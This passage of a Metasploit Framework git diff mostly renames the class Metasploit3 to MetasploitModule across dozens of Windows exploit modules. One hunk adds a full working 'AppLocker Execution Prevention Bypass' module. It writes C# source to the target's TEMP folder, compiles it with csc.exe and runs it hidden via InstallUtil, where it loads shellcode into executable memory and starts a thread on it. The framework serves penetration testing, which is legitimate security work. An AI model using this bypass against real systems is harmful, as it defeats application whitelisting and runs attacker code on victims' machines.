'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Imap diff --git a/modules/exploits/windows/imap/mailenable_w3c_select.rb b/modules/exploits/windows/imap/mailenable_w3c_select.rb index e13027054f..f10818b868 100644 --- a/modules/exploits/windows/imap/mailenable_w3c_select.rb +++ b/modules/exploits/windows/imap/mailenable_w3c_select.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Imap diff --git a/modules/exploits/windows/imap/mdaemon_cram_md5.rb b/modules/exploits/windows/imap/mdaemon_cram_md5.rb index 866fcb3116..f15372a824 100644 --- a/modules/exploits/windows/imap/mdaemon_cram_md5.rb +++ b/modules/exploits/windows/imap/mdaemon_cram_md5.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Imap diff --git a/modules/exploits/windows/imap/mdaemon_fetch.rb b/modules/exploits/windows/imap/mdaemon_fetch.rb index 36ee2fac67..b983440500 100644 --- a/modules/exploits/windows/imap/mdaemon_fetch.rb +++ b/modules/exploits/windows/imap/mdaemon_fetch.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Imap diff --git a/modules/exploits/windows/imap/mercur_imap_select_overflow.rb b/modules/exploits/windows/imap/mercur_imap_select_overflow.rb index b24383dc90..f4e2546d73 100644 --- a/modules/exploits/windows/imap/mercur_imap_select_overflow.rb +++ b/modules/exploits/windows/imap/mercur_imap_select_overflow.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Imap diff --git a/modules/exploits/windows/imap/mercur_login.rb b/modules/exploits/windows/imap/mercur_login.rb index f243370a84..7b580ad5dc 100644 --- a/modules/exploits/windows/imap/mercur_login.rb +++ b/modules/exploits/windows/imap/mercur_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/imap/mercury_login.rb b/modules/exploits/windows/imap/mercury_login.rb index 45327f91f3..621ae49de5 100644 --- a/modules/exploits/windows/imap/mercury_login.rb +++ b/modules/exploits/windows/imap/mercury_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/imap/mercury_rename.rb b/modules/exploits/windows/imap/mercury_rename.rb index 4ef6097ca4..8f6bacec40 100644 --- a/modules/exploits/windows/imap/mercury_rename.rb +++ b/modules/exploits/windows/imap/mercury_rename.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Imap diff --git a/modules/exploits/windows/imap/novell_netmail_append.rb b/modules/exploits/windows/imap/novell_netmail_append.rb index bae7c3804c..a254c10cd2 100644 --- a/modules/exploits/windows/imap/novell_netmail_append.rb +++ b/modules/exploits/windows/imap/novell_netmail_append.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Imap diff --git a/modules/exploits/windows/imap/novell_netmail_auth.rb b/modules/exploits/windows/imap/novell_netmail_auth.rb index eb566db50b..562013f2e4 100644 --- a/modules/exploits/windows/imap/novell_netmail_auth.rb +++ b/modules/exploits/windows/imap/novell_netmail_auth.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/imap/novell_netmail_status.rb b/modules/exploits/windows/imap/novell_netmail_status.rb index afe668e445..3f0cdc6c27 100644 --- a/modules/exploits/windows/imap/novell_netmail_status.rb +++ b/modules/exploits/windows/imap/novell_netmail_status.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Imap diff --git a/modules/exploits/windows/imap/novell_netmail_subscribe.rb b/modules/exploits/windows/imap/novell_netmail_subscribe.rb index 340c2ab009..1b317ddc1f 100644 --- a/modules/exploits/windows/imap/novell_netmail_subscribe.rb +++ b/modules/exploits/windows/imap/novell_netmail_subscribe.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Imap diff --git a/modules/exploits/windows/isapi/ms00_094_pbserver.rb b/modules/exploits/windows/isapi/ms00_094_pbserver.rb index 650164ac9e..de284832e7 100644 --- a/modules/exploits/windows/isapi/ms00_094_pbserver.rb +++ b/modules/exploits/windows/isapi/ms00_094_pbserver.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/isapi/ms03_022_nsiislog_post.rb b/modules/exploits/windows/isapi/ms03_022_nsiislog_post.rb index b9b5f4021a..884a2cb940 100644 --- a/modules/exploits/windows/isapi/ms03_022_nsiislog_post.rb +++ b/modules/exploits/windows/isapi/ms03_022_nsiislog_post.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/isapi/ms03_051_fp30reg_chunked.rb b/modules/exploits/windows/isapi/ms03_051_fp30reg_chunked.rb index bcd830845f..ffa2f21cb0 100644 --- a/modules/exploits/windows/isapi/ms03_051_fp30reg_chunked.rb +++ b/modules/exploits/windows/isapi/ms03_051_fp30reg_chunked.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/isapi/rsa_webagent_redirect.rb b/modules/exploits/windows/isapi/rsa_webagent_redirect.rb index fb6abff5d1..0c03aed308 100644 --- a/modules/exploits/windows/isapi/rsa_webagent_redirect.rb +++ b/modules/exploits/windows/isapi/rsa_webagent_redirect.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/isapi/w3who_query.rb b/modules/exploits/windows/isapi/w3who_query.rb index d870242fdc..0963967016 100644 --- a/modules/exploits/windows/isapi/w3who_query.rb +++ b/modules/exploits/windows/isapi/w3who_query.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking # XXX: Needs custom body check. HttpFingerprint = { :pattern => [ // ] } diff --git a/modules/exploits/windows/ldap/imail_thc.rb b/modules/exploits/windows/ldap/imail_thc.rb index 50a1a5f24d..abbb005e30 100644 --- a/modules/exploits/windows/ldap/imail_thc.rb +++ b/modules/exploits/windows/ldap/imail_thc.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/ldap/pgp_keyserver7.rb b/modules/exploits/windows/ldap/pgp_keyserver7.rb index a193758e93..1e98ff170f 100644 --- a/modules/exploits/windows/ldap/pgp_keyserver7.rb +++ b/modules/exploits/windows/ldap/pgp_keyserver7.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/license/calicclnt_getconfig.rb b/modules/exploits/windows/license/calicclnt_getconfig.rb index 4a7b594cd8..18ef7a6cb2 100644 --- a/modules/exploits/windows/license/calicclnt_getconfig.rb +++ b/modules/exploits/windows/license/calicclnt_getconfig.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/license/calicserv_getconfig.rb b/modules/exploits/windows/license/calicserv_getconfig.rb index 21dc18ab0e..0638dbae5b 100644 --- a/modules/exploits/windows/license/calicserv_getconfig.rb +++ b/modules/exploits/windows/license/calicserv_getconfig.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/license/flexnet_lmgrd_bof.rb b/modules/exploits/windows/license/flexnet_lmgrd_bof.rb index 28092a2253..1f7d26fd43 100644 --- a/modules/exploits/windows/license/flexnet_lmgrd_bof.rb +++ b/modules/exploits/windows/license/flexnet_lmgrd_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/license/sentinel_lm7_udp.rb b/modules/exploits/windows/license/sentinel_lm7_udp.rb index 0395c7089c..8fd7714f4b 100644 --- a/modules/exploits/windows/license/sentinel_lm7_udp.rb +++ b/modules/exploits/windows/license/sentinel_lm7_udp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/local/adobe_sandbox_adobecollabsync.rb b/modules/exploits/windows/local/adobe_sandbox_adobecollabsync.rb index a51426ae9c..cdbd812b7c 100644 --- a/modules/exploits/windows/local/adobe_sandbox_adobecollabsync.rb +++ b/modules/exploits/windows/local/adobe_sandbox_adobecollabsync.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = GreatRanking include Msf::Exploit::EXE diff --git a/modules/exploits/windows/local/agnitum_outpost_acs.rb b/modules/exploits/windows/local/agnitum_outpost_acs.rb index e8982c1720..681a42f712 100644 --- a/modules/exploits/windows/local/agnitum_outpost_acs.rb +++ b/modules/exploits/windows/local/agnitum_outpost_acs.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Exploit::EXE diff --git a/modules/exploits/windows/local/always_install_elevated.rb b/modules/exploits/windows/local/always_install_elevated.rb index 444f67a6de..5e90adb7e0 100644 --- a/modules/exploits/windows/local/always_install_elevated.rb +++ b/modules/exploits/windows/local/always_install_elevated.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Exploit::EXE diff --git a/modules/exploits/windows/local/applocker_bypass.rb b/modules/exploits/windows/local/applocker_bypass.rb new file mode 100644 index 0000000000..60d7f07787 --- /dev/null +++ b/modules/exploits/windows/local/applocker_bypass.rb @@ -0,0 +1,149 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Local + Rank = ExcellentRanking + + include Msf::Exploit::FileDropper + include Msf::Post::File + + def initialize(info={}) + super(update_info(info, + 'Name' => 'AppLocker Execution Prevention Bypass', + 'Description' => %q{ + This module will generate a .NET service executable on the target and utilise + InstallUtil to run the payload bypassing the AppLocker protection. + + Currently only the InstallUtil method is provided, but future methods can be + added easily. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Casey Smith', # Original AppLocker bypass research + 'OJ Reeves' # MSF module + ], + 'Platform' => [ 'win' ], + 'Arch' => [ ARCH_X86, ARCH_X86_64 ], + 'SessionTypes' => [ 'meterpreter' ], + 'Targets' => [ [ 'Windows', {} ] ], + 'DefaultTarget' => 0, + 'DisclosureDate'=> 'Aug 3 2015', + 'References' => + [ + ['URL', 'https://gist.github.com/subTee/fac6af078937dda81e57'] + ] + )) + + register_options([ + OptEnum.new('TECHNIQUE', [true, 'Technique to use to bypass AppLocker', + 'INSTALLUTIL', %w(INSTALLUTIL)])]) + end + + # Run Method for when run command is issued + def exploit + if datastore['TECHNIQUE'] == 'INSTALLUTIL' + if payload.arch.first == 'x64' && sysinfo['Architecture'] !~ /64/ + fail_with(Failure::NoTarget, 'The target platform is x86. 64-bit payloads are not supported.') + end + end + + # sysinfo is only on meterpreter sessions + print_status("Running module against #{sysinfo['Computer']}") if not sysinfo.nil? + + if datastore['TECHNIQUE'] == 'INSTALLUTIL' + execute_installutil + end + end + + def execute_installutil + envs = get_envs('TEMP', 'windir') + + dotnet_path = get_dotnet_path(envs['windir']) + print_status("Using .NET path #{dotnet_path}") + + cs_path = "#{envs['TEMP']}\\#{Rex::Text.rand_text_alpha(8)}.cs" + exe_path = "#{envs['TEMP']}\\#{Rex::Text.rand_text_alpha(8)}.exe" + + installutil_path = "#{dotnet_path}\\InstallUtil.exe" + + print_status("Writing payload to #{cs_path}") + write_file(cs_path, generate_csharp_source) + register_files_for_cleanup(cs_path) + + print_status("Compiling payload to #{exe_path}") + csc_path = "#{dotnet_path}\\csc.exe" + csc_platform = payload.arch.first == 'x86' ? 'x86' : 'x64' + vprint_status("Executing: #{csc_path} /target:winexe /nologo /platform:#{csc_platform} /w:0 /out:#{exe_path} #{cs_path}") + cmd_exec(csc_path, "/target:winexe /nologo /platform:#{csc_platform} /w:0 /out:#{exe_path} #{cs_path}") + + print_status("Executing payload ...") + vprint_status("Executing: #{installutil_path} /logfile= /LogToConsole=false /U #{exe_path}") + client.sys.process.execute(installutil_path, "/logfile= /LogToConsole=false /U #{exe_path}", {'Hidden' => true}) + register_files_for_cleanup(exe_path) + end + + def get_dotnet_path(windir) + base_path = "#{windir}\\Microsoft.NET\\Framework#{payload.arch.first == 'x86' ? '' : '64'}" + paths = dir(base_path).select {|p| p[0] == 'v'} + dotnet_path = nil + + paths.reverse.each do |p| + path = "#{base_path}\\#{p}" + if directory?(path) && file?("#{path}\\InstallUtil.exe") + dotnet_path = path + break + end + end + + unless dotnet_path + fail_with(Failure::NotVulnerable, '.NET is not present on the target.') + end + + dotnet_path + end + + def generate_csharp_source + sc = payload.encoded.each_byte.map {|b| "0x#{b.to_s(16)}"}.join(',') + cs = %Q^ +using System; + +namespace Pop +{ + public class Program { public static void Main() { } } + + [System.ComponentModel.RunInstaller(true)] + public class Pop : System.Configuration.Install.Installer + { + private static Int32 MEM_COMMIT=0x1000; + private static IntPtr PAGE_EXECUTE_READWRITE=(IntPtr)0x40; + private static UInt32 INFINITE = 0xFFFFFFFF; + + [System.Runtime.InteropServices.DllImport("kernel32")] + private static extern IntPtr VirtualAlloc(IntPtr a, UIntPtr s, Int32 t, IntPtr p); + + [System.Runtime.InteropServices.DllImport("kernel32")] + private static extern IntPtr CreateThread(IntPtr att, UIntPtr st, IntPtr sa, IntPtr p, Int32 c, ref IntPtr id); + + [System.Runtime.InteropServices.DllImport("kernel32")] + private static extern UInt32 WaitForSingleObject(IntPtr h, UInt32 ms); + + public override void Uninstall(System.Collections.IDictionary s) + { + byte[] sc = new byte[] {#{sc}}; + IntPtr m = VirtualAlloc(IntPtr.Zero, (UIntPtr)sc.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE); + System.Runtime.InteropServices.Marshal.Copy(sc, 0, m, sc.Length); + IntPtr id = IntPtr.Zero; + WaitForSingleObject(CreateThread(id, UIntPtr.Zero, m, id, 0, ref id), INFINITE); + } + } +} + ^ + + cs + end + +end + diff --git a/modules/exploits/windows/local/ask.rb b/modules/exploits/windows/local/ask.rb index 00c7b0b0bb..2f724f8609 100644 --- a/modules/exploits/windows/local/ask.rb +++ b/modules/exploits/windows/local/ask.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Post::Windows::Priv diff --git a/modules/exploits/windows/local/bthpan.rb b/modules/exploits/windows/local/bthpan.rb index e0e5d015cd..b084b24773 100644 --- a/modules/exploits/windows/local/bthpan.rb +++ b/modules/exploits/windows/local/bthpan.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/exploit/local/windows_kernel' require 'rex' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = AverageRanking include Msf::Exploit::Local::WindowsKernel diff --git a/modules/exploits/windows/local/bypassuac.rb b/modules/exploits/windows/local/bypassuac.rb index 8cfb23418c..f5681dbe45 100644 --- a/modules/exploits/windows/local/bypassuac.rb +++ b/modules/exploits/windows/local/bypassuac.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Exploit::EXE diff --git a/modules/exploits/windows/local/bypassuac_injection.rb b/modules/exploits/windows/local/bypassuac_injection.rb index 9bc5fa4028..3262061082 100644 --- a/modules/exploits/windows/local/bypassuac_injection.rb +++ b/modules/exploits/windows/local/bypassuac_injection.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/exe' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Exploit::EXE diff --git a/modules/exploits/windows/local/bypassuac_vbs.rb b/modules/exploits/windows/local/bypassuac_vbs.rb index b560da405e..ae10158825 100644 --- a/modules/exploits/windows/local/bypassuac_vbs.rb +++ b/modules/exploits/windows/local/bypassuac_vbs.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Exploit::FileDropper diff --git a/modules/exploits/windows/local/current_user_psexec.rb b/modules/exploits/windows/local/current_user_psexec.rb index 58729c5f29..46c9d307fb 100644 --- a/modules/exploits/windows/local/current_user_psexec.rb +++ b/modules/exploits/windows/local/current_user_psexec.rb @@ -8,7 +8,7 @@ require 'rex' require 'msf/core/exploit/powershell' require 'msf/core/exploit/exe' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Post::Windows::Services diff --git a/modules/exploits/windows/local/ikeext_service.rb b/modules/exploits/windows/local/ikeext_service.rb index 7278e5aee6..e5c9b15868 100644 --- a/modules/exploits/windows/local/ikeext_service.rb +++ b/modules/exploits/windows/local/ikeext_service.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = GoodRanking include Msf::Exploit::EXE diff --git a/modules/exploits/windows/local/ipass_launch_app.rb b/modules/exploits/windows/local/ipass_launch_app.rb index 1a49cb233d..566b014ddf 100644 --- a/modules/exploits/windows/local/ipass_launch_app.rb +++ b/modules/exploits/windows/local/ipass_launch_app.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Exploit::EXE diff --git a/modules/exploits/windows/local/lenovo_systemupdate.rb b/modules/exploits/windows/local/lenovo_systemupdate.rb index 35e5fe61b1..1eeeb00c31 100644 --- a/modules/exploits/windows/local/lenovo_systemupdate.rb +++ b/modules/exploits/windows/local/lenovo_systemupdate.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local include Msf::Exploit::EXE include Msf::Post::File include Msf::Exploit::FileDropper diff --git a/modules/exploits/windows/local/mqac_write.rb b/modules/exploits/windows/local/mqac_write.rb index 024fb55adc..8938107475 100644 --- a/modules/exploits/windows/local/mqac_write.rb +++ b/modules/exploits/windows/local/mqac_write.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/exploit/local/windows_kernel' require 'rex' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = AverageRanking include Msf::Exploit::Local::WindowsKernel diff --git a/modules/exploits/windows/local/ms10_015_kitrap0d.rb b/modules/exploits/windows/local/ms10_015_kitrap0d.rb index 8145b65278..351038ada4 100644 --- a/modules/exploits/windows/local/ms10_015_kitrap0d.rb +++ b/modules/exploits/windows/local/ms10_015_kitrap0d.rb @@ -8,7 +8,7 @@ require 'msf/core/post/windows/reflective_dll_injection' require 'msf/core/exploit/exe' require 'rex' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = GreatRanking include Msf::Post::File diff --git a/modules/exploits/windows/local/ms10_092_schelevator.rb b/modules/exploits/windows/local/ms10_092_schelevator.rb index dc91903f4b..407161bcf0 100644 --- a/modules/exploits/windows/local/ms10_092_schelevator.rb +++ b/modules/exploits/windows/local/ms10_092_schelevator.rb @@ -8,7 +8,7 @@ require 'rex' require 'zlib' require 'msf/core/exploit/exe' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Exploit::EXE diff --git a/modules/exploits/windows/local/ms11_080_afdjoinleaf.rb b/modules/exploits/windows/local/ms11_080_afdjoinleaf.rb index 662481af63..f058484caf 100644 --- a/modules/exploits/windows/local/ms11_080_afdjoinleaf.rb +++ b/modules/exploits/windows/local/ms11_080_afdjoinleaf.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/exploit/local/windows_kernel' require 'rex' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = AverageRanking # Average because this module relies on memory corruption within the # kernel, this is inherently dangerous. Also if the payload casues diff --git a/modules/exploits/windows/local/ms13_005_hwnd_broadcast.rb b/modules/exploits/windows/local/ms13_005_hwnd_broadcast.rb index 8729306125..c8a04ce87c 100644 --- a/modules/exploits/windows/local/ms13_005_hwnd_broadcast.rb +++ b/modules/exploits/windows/local/ms13_005_hwnd_broadcast.rb @@ -9,7 +9,7 @@ require 'msf/core/exploit/exe' require 'msf/core/exploit/powershell' require 'msf/core/post/file' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Exploit::Powershell diff --git a/modules/exploits/windows/local/ms13_053_schlamperei.rb b/modules/exploits/windows/local/ms13_053_schlamperei.rb index 8d647f7a8d..3900bcd413 100644 --- a/modules/exploits/windows/local/ms13_053_schlamperei.rb +++ b/modules/exploits/windows/local/ms13_053_schlamperei.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/post/windows/reflective_dll_injection' require 'rex' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = AverageRanking include Msf::Post::File diff --git a/modules/exploits/windows/local/ms13_081_track_popup_menu.rb b/modules/exploits/windows/local/ms13_081_track_popup_menu.rb index 7095e49f9e..1113a98ddf 100644 --- a/modules/exploits/windows/local/ms13_081_track_popup_menu.rb +++ b/modules/exploits/windows/local/ms13_081_track_popup_menu.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/post/windows/reflective_dll_injection' require 'rex' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = AverageRanking include Msf::Post::File diff --git a/modules/exploits/windows/local/ms13_097_ie_registry_symlink.rb b/modules/exploits/windows/local/ms13_097_ie_registry_symlink.rb index de49e4a47d..dae1068507 100644 --- a/modules/exploits/windows/local/ms13_097_ie_registry_symlink.rb +++ b/modules/exploits/windows/local/ms13_097_ie_registry_symlink.rb @@ -8,7 +8,7 @@ require 'rex' require 'msf/core/exploit/exe' require 'msf/core/exploit/powershell' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = GreatRanking include Msf::Exploit::Powershell diff --git a/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb b/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb index a4d5236714..62d6b47a1d 100644 --- a/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb +++ b/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb @@ -8,7 +8,7 @@ require 'rex' require 'msf/core/exploit/exe' require 'msf/core/exploit/powershell' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = GreatRanking include Msf::Exploit::Powershell diff --git a/modules/exploits/windows/local/ms14_058_track_popup_menu.rb b/modules/exploits/windows/local/ms14_058_track_popup_menu.rb index 2908ef555f..6e84605d84 100644 --- a/modules/exploits/windows/local/ms14_058_track_popup_menu.rb +++ b/modules/exploits/windows/local/ms14_058_track_popup_menu.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/post/windows/reflective_dll_injection' require 'rex' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = NormalRanking include Msf::Post::File diff --git a/modules/exploits/windows/local/ms14_070_tcpip_ioctl.rb b/modules/exploits/windows/local/ms14_070_tcpip_ioctl.rb index d1430d6bab..e1eb99561c 100644 --- a/modules/exploits/windows/local/ms14_070_tcpip_ioctl.rb +++ b/modules/exploits/windows/local/ms14_070_tcpip_ioctl.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/exploit/local/windows_kernel' require 'rex' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = AverageRanking include Msf::Exploit::Local::WindowsKernel diff --git a/modules/exploits/windows/local/ms15_004_tswbproxy.rb b/modules/exploits/windows/local/ms15_004_tswbproxy.rb index a8cf36d104..1d78cc08f4 100644 --- a/modules/exploits/windows/local/ms15_004_tswbproxy.rb +++ b/modules/exploits/windows/local/ms15_004_tswbproxy.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = GoodRanking include Msf::Post::File diff --git a/modules/exploits/windows/local/ms15_051_client_copy_image.rb b/modules/exploits/windows/local/ms15_051_client_copy_image.rb index afa42a0dcd..eae20ef784 100644 --- a/modules/exploits/windows/local/ms15_051_client_copy_image.rb +++ b/modules/exploits/windows/local/ms15_051_client_copy_image.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/post/windows/reflective_dll_injection' require 'rex' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = NormalRanking include Msf::Post::File diff --git a/modules/exploits/windows/local/ms15_078_atmfd_bof.rb b/modules/exploits/windows/local/ms15_078_atmfd_bof.rb index e78ff63d46..76dbcb4529 100644 --- a/modules/exploits/windows/local/ms15_078_atmfd_bof.rb +++ b/modules/exploits/windows/local/ms15_078_atmfd_bof.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/post/windows/reflective_dll_injection' require 'rex' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = ManualRanking WIN32K_VERSIONS = [ diff --git a/modules/exploits/windows/local/ms_ndproxy.rb b/modules/exploits/windows/local/ms_ndproxy.rb index dfa59f4b35..441ee622ba 100644 --- a/modules/exploits/windows/local/ms_ndproxy.rb +++ b/modules/exploits/windows/local/ms_ndproxy.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/exploit/local/windows_kernel' require 'rex' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = AverageRanking include Msf::Exploit::Local::WindowsKernel diff --git a/modules/exploits/windows/local/novell_client_nicm.rb b/modules/exploits/windows/local/novell_client_nicm.rb index 97b5f6d5b6..48e194aefb 100644 --- a/modules/exploits/windows/local/novell_client_nicm.rb +++ b/modules/exploits/windows/local/novell_client_nicm.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = AverageRanking include Msf::Post::Windows::Priv diff --git a/modules/exploits/windows/local/novell_client_nwfs.rb b/modules/exploits/windows/local/novell_client_nwfs.rb index e68b7eb646..9a2ef1896d 100644 --- a/modules/exploits/windows/local/novell_client_nwfs.rb +++ b/modules/exploits/windows/local/novell_client_nwfs.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = AverageRanking include Msf::Post::Windows::Priv diff --git a/modules/exploits/windows/local/ntapphelpcachecontrol.rb b/modules/exploits/windows/local/ntapphelpcachecontrol.rb index a0269a72b3..5550173d86 100644 --- a/modules/exploits/windows/local/ntapphelpcachecontrol.rb +++ b/modules/exploits/windows/local/ntapphelpcachecontrol.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/post/windows/reflective_dll_injection' -class Metasploit3 < 